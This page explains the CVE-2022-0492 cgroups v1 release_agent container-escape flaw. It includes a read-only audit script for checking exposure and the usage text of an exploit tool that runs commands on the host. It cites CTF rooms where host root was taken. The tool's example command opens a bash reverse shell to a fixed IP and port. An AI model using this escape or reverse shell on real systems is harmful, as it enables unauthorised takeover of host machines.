Exploiting the vulnerability requires the attacker to have access to a Docker container running on a vulnerable system. Once exploited, the attacker can escape the container and gain complete control over the host system.
A vulnerability was found in the Linux kernel's cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c. Under certain circumstances, this flaw allows the cgroups v1 release_agent feature to be used to escalate privileges and unexpectedly bypass namespace isolation.
More simply put, cgroups v1 has a feature called release_agent: when the last process in a cgroup exits and the cgroup becomes empty, the kernel runs the program named in that file. If notify_on_release is enabled, the kernel runs the release_agent binary as root, outside the container's namespaces. By editing the release_agent file, an attacker can therefore get their own binary executed with elevated privileges and take control of the system. Normally the release_agent file is owned by root, so only a user with root access can modify it; the flaw is that the kernel did not verify that the process writing the file held that privilege in the initial user namespace, which is what lets the write succeed from inside a container.
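The preconditions just described (cgroup v1 present, the capability that guards release_agent, and the seccomp filter that normally limits namespace and mount operations) can be checked from inside a container. The following hardening audit is an added example in POSIX sh, not the CVE-2022-0492.sh script this page describes; the function names, the verdict wording and the assumption that a tmpfs at /sys/fs/cgroup indicates a v1 or hybrid layout are this example's own.

```shell
#!/bin/sh
# Added hardening audit (not the page's CVE-2022-0492.sh). Function names and verdict
# wording are this example's choices; the capability bit, the /proc fields and the
# stat(1) filesystem type names are standard Linux.

# CAP_SYS_ADMIN is capability bit 21 of the hex CapEff mask in /proc/<pid>/status.
cap_sys_admin_in_mask() {              # $1: hex mask, e.g. 00000000a80425fb (Docker default)
    if [ $(( (0x$1 >> 21) & 1 )) -eq 1 ]; then echo yes; else echo no; fi
}

# Seccomp mode from a /proc/<pid>/status text: 0 = off, 1 = strict, 2 = filter.
seccomp_mode_of() {                    # $1: full status text
    printf '%s\n' "$1" | awk '/^Seccomp:/ { print $2; f=1 } END { if (!f) print "unknown" }'
}

# Classify what `stat -fc %T /sys/fs/cgroup` reports: only cgroup v1 has a release_agent file.
cgroup_fs_kind() {                     # $1: filesystem type name
    case "$1" in
        cgroup2fs) echo v2 ;;          # unified hierarchy: no release_agent file exists
        cgroupfs|tmpfs) echo v1 ;;     # assumed legacy or hybrid layout exposing v1 controllers
        *) echo unknown ;;
    esac
}

# Turn the three observations into a verdict; the kernel patch is the real fix in every case.
risk_verdict() {                       # $1: yes|no CAP_SYS_ADMIN, $2: seccomp mode, $3: v1|v2|unknown
    if [ "$3" = v2 ]; then echo "low: cgroup v2 only, no v1 release_agent to reach"; return; fi
    if [ "$1" = yes ]; then echo "high: CAP_SYS_ADMIN granted on cgroup v1; drop it and patch the kernel"; return; fi
    if [ "$2" = 2 ]; then echo "reduced: seccomp filter active (Docker's default profile); still patch the kernel"; return; fi
    echo "high: cgroup v1 with no seccomp filter; enable the default profile and patch the kernel"
}

# Live audit of the current process; read-only, safe to run inside any container.
audit() {
    status=$(cat /proc/self/status)
    mask=$(printf '%s\n' "$status" | awk '/^CapEff:/ { print $2 }')
    fs=$(stat -fc %T /sys/fs/cgroup 2>/dev/null || echo unknown)
    cap=$(cap_sys_admin_in_mask "${mask:-0}")
    mode=$(seccomp_mode_of "$status")
    kind=$(cgroup_fs_kind "$fs")
    printf 'CAP_SYS_ADMIN=%s seccomp=%s cgroup=%s\n' "$cap" "$mode" "$kind"
    risk_verdict "$cap" "$mode" "$kind"
}

if [ -r /proc/self/status ]; then audit; fi
```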
# sh CVE-2022-0492.sh
[>] CVE-2022-0492 Docker Container Escape
[>] Execute this script in a Docker to check for vulnerability or to exploit it.
[>] Usage:
sh CVE-2022-0492.sh --checker Verify if system is vulnerable.
sh CVE-2022-0492.sh -c|--command <COMMAND> Execute command on host machine.
sh CVE-2022-0492.sh -h|--help Print the help panel.
[>] Example:
sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'
Hamlet from TryHackMe
Root user on the host machine pwned by disabling UFW and then sending a reverse shell.
Misguided Ghosts from TryHackMe
Root user on the host machine pwned by setting SUID on bash; also sent a reverse shell.